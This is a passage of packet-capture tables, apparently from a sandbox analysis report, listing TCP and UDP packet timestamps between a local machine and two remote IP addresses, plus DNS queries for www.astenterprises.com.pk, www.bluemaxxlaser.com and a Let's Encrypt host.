                                                                                          Dec 19, 2024 12:52:46.163616896 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.163651943 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.163680077 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.276433945 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.276468992 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.276587963 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.276604891 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.276654005 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.316740990 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.316759109 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.316940069 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.316956997 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.316996098 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.447693110 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.447756052 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.447788954 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.447810888 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.447854996 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.474601984 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.474651098 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.474701881 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.474711895 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.474766016 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.497703075 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.497725010 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.497776985 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.497787952 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.497844934 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.524972916 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.524991989 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.525036097 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.525043011 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.525091887 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.635762930 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.635792017 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.635838032 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.635847092 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.635886908 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.655030966 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.655050993 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.655107021 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.655112028 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.655157089 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.670872927 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.670893908 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.670943975 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.670948029 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.671008110 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.689316988 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.689333916 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.689393997 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.689399004 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.689459085 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.707704067 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.707724094 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.707798004 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.707809925 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.707860947 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.726176023 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.726196051 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.726243973 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.726249933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.726308107 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.818260908 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.818284988 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.818367004 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.818376064 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.818435907 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.830415010 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.830432892 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.830508947 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.830526114 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.830575943 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.843308926 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.843379021 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.843425989 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.843462944 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.843483925 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.843521118 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.855293036 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.855356932 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.855390072 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.855396032 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.855427980 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.855454922 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.865473032 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.865531921 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.865560055 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.865570068 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.865621090 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.877895117 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.877921104 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.878132105 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.878145933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.878189087 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.887969971 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.888000965 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.888077021 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.888086081 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.888134956 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.899594069 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.899610996 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.899674892 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.899681091 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.899713039 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.014039040 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.014066935 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.014307976 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.014374971 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.014440060 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.021239996 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.021256924 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.021361113 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.021375895 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.021430969 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.030011892 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.030056000 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.030137062 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.030152082 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.030198097 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.030237913 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.037128925 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.037173033 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.037245035 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.037245035 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.037273884 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.037368059 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.044656992 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.044704914 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.044734001 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.044749975 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.044780970 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.044821024 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.052557945 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.052606106 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.052666903 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.052679062 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.052714109 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.052742004 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.059370041 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.059392929 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.059463024 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.059478998 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.059520006 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.067342043 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.067370892 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.067502022 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.067533016 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.067578077 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.205194950 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.205224991 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.205305099 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.205379963 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.205416918 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.205450058 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.212727070 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.212748051 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.212833881 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.212852001 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.212883949 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.212902069 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.219474077 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.219504118 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.219567060 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.219583035 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.219649076 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.227561951 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.227612019 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.227653980 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.227668047 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.227715969 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.227734089 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234519005 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234563112 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234608889 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234622955 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234654903 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234673023 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.241599083 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241641045 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241677999 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.241684914 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241750002 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.249147892 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249193907 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249222994 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.249228954 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249285936 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.256946087 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.256988049 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.257020950 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.257025957 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.257076979 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397499084 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397552013 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397595882 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397627115 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397656918 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397675037 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404830933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404858112 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404921055 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404937029 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404973030 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404999018 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411488056 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411515951 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411557913 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411572933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411597967 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411629915 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.419095993 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419112921 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419179916 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.419194937 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419246912 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.426116943 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426135063 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426198959 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.426213026 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426280975 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.433819056 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433903933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433917046 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.433943987 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433979034 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.434000015 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.441231012 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441247940 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441301107 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.441307068 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441340923 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.447894096 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.447916985 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.447971106 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.447978020 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.448045969 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.589829922 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.589915991 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.589956999 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.590030909 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.590066910 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.590112925 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597117901 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597160101 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597194910 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597208023 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597234011 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597249985 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.604645967 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604664087 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604770899 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.604785919 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604840040 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.611294031 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611310959 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611376047 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.611391068 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611454010 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.618298054 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618313074 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618391991 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.618405104 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618613005 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.625825882 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625843048 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625909090 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.625922918 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625969887 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633637905 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633681059 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633717060 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633728981 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633755922 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633771896 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641017914 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.641060114 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.641096115 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641108036 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.641134024 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641153097 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.776725054 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776813984 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.776892900 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776932955 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776983976 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.782660961 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:48.260114908 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.380018950 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:48.380122900 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.380553007 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.500829935 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:49.913054943 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:49.963270903 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:51.000288010 CET4972080192.168.2.6203.175.174.69

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 19, 2024 12:52:44.177407026 CET5443753192.168.2.61.1.1.1
                                                                                          Dec 19, 2024 12:52:44.315325022 CET53544371.1.1.1192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.925538063 CET6242253192.168.2.61.1.1.1
                                                                                          Dec 19, 2024 12:52:48.259370089 CET53624221.1.1.1192.168.2.6
                                                                                          Dec 19, 2024 12:52:59.054878950 CET5968953192.168.2.61.1.1.1
                                                                                          Dec 19, 2024 12:53:13.371503115 CET5793153192.168.2.61.1.1.1
                                                                                          Dec 19, 2024 12:53:37.449223995 CET6275653192.168.2.61.1.1.1

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 19, 2024 12:52:44.177407026 CET192.168.2.61.1.1.10xfb81Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:52:47.925538063 CET192.168.2.61.1.1.10x1440Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:52:59.054878950 CET192.168.2.61.1.1.10xd645Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:53:13.371503115 CET192.168.2.61.1.1.10xebabStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:53:37.449223995 CET192.168.2.61.1.1.10xf403Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 19, 2024 12:52:44.315325022 CET1.1.1.1192.168.2.60xfb81No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 12:52:44.315325022 CET1.1.1.1192.168.2.60xfb81No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:52:48.259370089 CET1.1.1.1192.168.2.60x1440No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 12:52:59.192889929 CET1.1.1.1192.168.2.60xd645No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 12:53:13.587078094 CET1.1.1.1192.168.2.60xebabNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
